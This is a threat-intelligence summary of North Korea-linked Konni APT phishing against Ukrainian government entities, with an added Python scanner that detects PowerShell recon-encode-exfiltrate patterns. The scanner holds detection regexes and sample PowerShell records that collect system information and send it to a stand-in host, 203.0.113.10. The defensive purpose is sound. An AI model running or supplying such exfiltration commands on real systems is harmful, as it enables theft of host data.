The North Korea-linked threat actor Konni APT has launched a phishing campaign targeting Ukrainian government entities to gather strategic intelligence on the Russian invasion. This activity shows that Konni's targeting extends beyond Russia and is focused on political and military intelligence collection.
Affected: Ukrainian government entities and the Ukrainian military
Key points
- Konni APT, also known as Opal Sleet and Vedalia, has been active since 2014, targeting entities in South Korea, the US, Russia, and now Ukraine.
- The group uses phishing emails, malware like Konni RAT, and credential harvesting tactics to infiltrate targets and gather intelligence.
- The latest campaigns impersonate a fictitious think tank and deliver RAR archives that pair decoy content with malicious PowerShell payloads.
- Attackers conduct reconnaissance and exfiltrate data by executing PowerShell scripts that encode and send system information to attacker-controlled servers.
- TA406 (Proofpoint's name for Konni) runs multi-stage campaigns: spear-phishing with ZIP archives, LNK files that launch PowerShell, and PowerShell scripts that steal sensitive information.
- The group has also engaged in credential harvesting by sending fake security alerts, aiming to collect login details of Ukrainian officials.
- These activities are likely aimed at informing North Korean leadership about the geopolitical and military situation, especially regarding Russian actions in Ukraine.
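The two PowerShell points above (encoded system information sent to attacker-controlled servers, and LNK files that launch PowerShell) share one detection opportunity: the combination of host reconnaissance, Base64 encoding and outbound transfer in a single script block. The scanner below is an added example written for this summary; it is not code from Proofpoint, The Hacker News or the actor. It assumes you can feed it the ScriptBlockText of Windows PowerShell event 4104 (or any captured command line). The indicator lists, the sample records and the 203.0.113.10 address are constructed for illustration and are not published Konni indicators.

```python
"""Scan PowerShell script-block text for the recon + encode + egress pattern.

Added example for this summary, not code from Proofpoint, The Hacker News, or the
actor. Indicator lists and sample records are constructed; they are not Konni IOCs.
"""
import base64
import re

# Hypothetical indicator categories. Each regex has exactly one capturing group so
# re.findall returns the matched token for reporting.
PATTERNS = {
    # commands that enumerate host, user, process or network details
    "recon": r"\b(systeminfo|whoami|tasklist|ipconfig|hostname|Get-ComputerInfo|Get-Process|"
             r"Get-NetIPAddress|Get-WmiObject|Get-CimInstance)\b",
    # wrapping collected output, or the command itself, in Base64
    "encode": r"(\[Convert\]::ToBase64String|-EncodedCommand\b|-enc\b|-ec\b)",
    # sending data to, or fetching from, a remote host
    "egress": r"(Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|UploadString|UploadData|"
              r"UploadFile|DownloadString|DownloadFile)",
    # launch flags typical of an LNK or CHM stub rather than an interactive admin
    "stealth": r"(-WindowStyle\s+Hidden|-w\s+hidden|-NoProfile|-nop\b|-ExecutionPolicy\s+Bypass|-ep\s+bypass)",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in PATTERNS.items()}

# Argument of -EncodedCommand and its short forms. PowerShell expects the Base64 to
# wrap UTF-16LE text, which is why a naive UTF-8 decode of it looks like noise.
ENC_ARG = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def encode_command(command):
    """Produce the value PowerShell accepts after -EncodedCommand (UTF-16LE, then Base64)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_command(blob):
    """Inverse of encode_command; returns None when the blob is not a valid encoded command."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(script):
    """Return {'hits': {category: [tokens]}, 'decoded': [inner commands], 'suspicious': bool}.

    Encoded commands are decoded and scanned too, so indicators hidden inside the
    Base64 blob count. The verdict requires egress plus encoding plus either
    reconnaissance or a stealth launch flag; any single category on its own is
    routine in admin scripting.
    """
    decoded = [d for d in (decode_command(b) for b in ENC_ARG.findall(script)) if d]
    text = "\n".join([script] + decoded)
    hits = {}
    for name, rx in COMPILED.items():
        found = sorted({m.lower() for m in rx.findall(text)})
        if found:
            hits[name] = found
    suspicious = "egress" in hits and "encode" in hits and ("recon" in hits or "stealth" in hits)
    return {"hits": hits, "decoded": decoded, "suspicious": suspicious}


def scan_records(records):
    """Apply analyze() to a list of {'id', 'script'} records; returns (id, verdict) pairs."""
    return [(rec["id"], analyze(rec["script"])) for rec in records]


# Constructed sample records standing in for event 4104 ScriptBlockText. The
# 203.0.113.0/24 address is the RFC 5737 documentation range, not a real C2.
SAMPLE_RECORDS = [
    {"id": "evt-0001",  # routine admin task: recon only, no encoding, no egress
     "script": r"Get-Process | Export-Csv C:\Temp\procs.csv"},
    {"id": "evt-0002",  # host survey encoded and POSTed in clear PowerShell
     "script": "\n".join([
         "$info = (systeminfo | Out-String) + (Get-Process | Out-String)",
         "$b = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($info))",
         "Invoke-WebRequest -Uri 'http://203.0.113.10/upload' -Method POST -Body $b",
     ])},
    {"id": "evt-0003",  # LNK-style launcher: the interesting part is inside -enc
     "script": "powershell.exe -NoProfile -w hidden -enc " + encode_command(
         "$u = whoami; (New-Object Net.WebClient).UploadString('http://203.0.113.10/x', $u)")},
]

if __name__ == "__main__":
    for rec_id, verdict in scan_records(SAMPLE_RECORDS):
        flag = "SUSPICIOUS" if verdict["suspicious"] else "ok"
        print(f"{rec_id}: {flag} {verdict['hits']}")
```

The triad rule, rather than any single indicator, keeps the false-positive rate workable: Get-Process and Invoke-WebRequest are everyday admin commands, but a script that enumerates the host, Base64-wraps the result and ships it out in one go is the behaviour the summary describes. Decoding -EncodedCommand before matching matters because an LNK stub typically carries the real commands only in that blob.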
Read More: https://thehackernews.com/2025/05/north-korean-konni-apt-targets-ukraine.html